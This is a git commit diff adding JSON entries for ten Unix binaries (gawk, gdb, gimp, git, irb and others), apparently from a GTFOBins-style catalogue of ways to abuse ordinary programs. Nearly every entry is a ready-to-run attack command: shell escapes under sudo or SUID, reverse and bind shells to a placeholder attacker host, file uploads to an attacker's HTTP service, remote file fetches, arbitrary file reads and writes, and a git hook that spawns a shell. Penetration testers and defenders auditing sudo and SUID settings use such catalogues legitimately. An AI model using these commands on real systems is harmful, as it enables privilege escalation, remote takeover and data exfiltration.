add new sources

4 years ago · 13dffad254
parent 577a6aa51c
commit 13dffad254
10 changed files with 356 additions and 0 deletions
--- a/data/gawk.json
+++ b/data/gawk.json
@ -0,0 +1,41 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "gawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "gawk 'BEGIN {\n    s = \"/inet/tcp/0/[host]/[port]\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc target.com 12345' on the attacker box to connect to the shell.",
+        "code": "gawk 'BEGIN {\n    s = \"/inet/tcp/[port]/0/0\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "gawk 'BEGIN { print \"DATA\" > \"[file]\" }'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "gawk '//' [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo gawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./gawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ]
+  }
+}
--- a/data/gdb.json
+++ b/data/gdb.json
@ -0,0 +1,66 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "gdb -nx -ex '!sh' -ex quit"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "This requires that GDB is compiled with Python support. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "gdb -nx -ex 'python import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' -ex quit\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "This requires that GDB is compiled with Python support. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\",).read()}).encode()))' -ex quit\n"
+      },
+      {
+        "description": "This requires that GDB is compiled with Python support. Serve files in the local folder running an HTTP server.",
+        "code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.",
+        "code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\",)' -ex quit\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "This requires that GDB is compiled with Python support.",
+        "code": "gdb -nx -ex \"dump value [file] \\\"DATA\\\"\" -ex quit\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "This requires that GDB is compiled with Python support.",
+        "code": "gdb -nx -ex 'python print(open(\"[file]\").read())' -ex quit"
+      }
+    ],
+    "library-load": [
+      {
+        "description": "This requires that GDB is compiled with Python support.",
+        "code": "gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' -ex quit"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This requires that GDB is compiled with Python support.",
+        "code": "./gdb -nx -ex 'python import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")' -ex quit"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo gdb -nx -ex '!sh' -ex quit"
+      }
+    ],
+    "capabilities": [
+      {
+        "description": "This requires that GDB is compiled with Python support.",
+        "code": "./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit"
+      }
+    ]
+  }
+}
--- a/data/gimp.json
+++ b/data/gimp.json
@ -0,0 +1,57 @@
+{
+  "description": "The binary hangs after executing the Python code and can be terminated pressing 'ctrl-c'.",
+  "functions": {
+    "shell": [
+      {
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\", [port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))'\n"
+      },
+      {
+        "description": "Serve files in the local folder running an HTTP server.",
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'open(\"[file]\", \"wb\").write(\"DATA\")'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'print(open(\"[file]\").read())'"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")'"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'"
+      }
+    ]
+  }
+}
--- a/data/git.json
+++ b/data/git.json
@ -0,0 +1,39 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "PAGER='sh -c \"exec sh 0<&1\"' git -p help"
+      },
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "git help config\n!/bin/sh\n"
+      },
+      {
+        "description": "Git hooks are merely shell scripts and in the following example the hook associated to the 'pre-commit' action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the '-C' option.",
+        "code": "TF=$(mktemp -d)\ngit init \"$TF\"\necho 'exec /bin/sh 0<&2 1>&2' >\"$TF/.git/hooks/pre-commit.sample\"\nmv \"$TF/.git/hooks/pre-commit.sample\" \"$TF/.git/hooks/pre-commit\"\ngit -C \"$TF\" commit --allow-empty -m x\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "PAGER='sh -c \"exec sh 0<&1\"' sudo -E git -p help"
+      },
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo git -p help config\n!/bin/sh\n"
+      },
+      {
+        "description": "The help system can also be reached from any 'git' command, e.g., 'git branch'. This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo git branch --help config\n!/bin/sh\n"
+      },
+      {
+        "description": "Git hooks are merely shell scripts and in the following example the hook associated to the 'pre-commit' action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the '-C' option.",
+        "code": "TF=$(mktemp -d)\ngit init \"$TF\"\necho 'exec /bin/sh 0<&2 1>&2' >\"$TF/.git/hooks/pre-commit.sample\"\nmv \"$TF/.git/hooks/pre-commit.sample\" \"$TF/.git/hooks/pre-commit\"\nsudo git -C \"$TF\" commit --allow-empty -m x\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "PAGER='sh -c \"exec sh 0<&1\"' ./git -p help"
+      }
+    ]
+  }
+}
--- a/data/grep.json
+++ b/data/grep.json
@ -0,0 +1,20 @@
+{
+  "description": "There are many 'grep' flavors that in many cases are just copies, symlinks or wrappers around the original binary that may share the same behavior, for example: 'egrep', 'fgrep', 'zgrep', etc.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "grep '' [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./grep '' [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo grep '' [file]\n"
+      }
+    ]
+  }
+}
--- a/data/head.json
+++ b/data/head.json
@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "head -c1G [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./head -c1G [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo head -c1G [file]\n"
+      }
+    ]
+  }
+}
--- a/data/iftop.json
+++ b/data/iftop.json
@ -0,0 +1,20 @@
+{
+  "description": "This requires 'iftop' 1.17 and the privilege to capture on some device (specify with '-i' if needed) .",
+  "functions": {
+    "shell": [
+      {
+        "code": "iftop\n!/bin/sh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./iftop\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo iftop\n!/bin/sh\n"
+      }
+    ]
+  }
+}
--- a/data/ionice.json
+++ b/data/ionice.json
@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ionice /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ionice /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ionice /bin/sh"
+      }
+    ]
+  }
+}
--- a/data/ip.json
+++ b/data/ip.json
@ -0,0 +1,28 @@
+{
+  "description": "The read file content is corrupted by error prints.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "ip -force -batch [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ip -force -batch [file]\n"
+      },
+      {
+        "description": "This only works for Linux with CONFIG_NET_NS=y.",
+        "code": "./ip netns add foo\n./ip netns exec foo /bin/sh -p\n./ip netns delete foo\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ip -force -batch [file]\n"
+      },
+      {
+        "description": "This only works for Linux with CONFIG_NET_NS=y.",
+        "code": "sudo ip netns add foo\nsudo ip netns exec foo /bin/sh\nsudo ip netns delete foo\n"
+      }
+    ]
+  }
+}
--- a/data/irb.json
+++ b/data/irb.json
@ -0,0 +1,47 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "irb\nexec '/bin/bash'\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "irb\nrequire 'socket'; exit if fork;c=TCPSocket.new('[host]', [port]);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read} end\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Serve files in the local folder running an HTTP server on port [port].",
+        "code": "irb\nrequire 'webrick'; WEBrick::HTTPServer.new(:Port => [port], :DocumentRoot => Dir.pwd).start;\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "irb\nrequire 'open-uri'; IO.copy_stream(open('[url]'), '[file]')\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "irb\nFile.open(\"[file]\", \"w+\") { |f| f.write(\"DATA\") }\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "irb\nputs File.read(\"[file]\")\n"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "irb\nrequire \"fiddle\"; Fiddle.dlopen(\"lib.so\")\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo irb\nexec '/bin/bash'\n"
+      }
+    ]
+  }
+}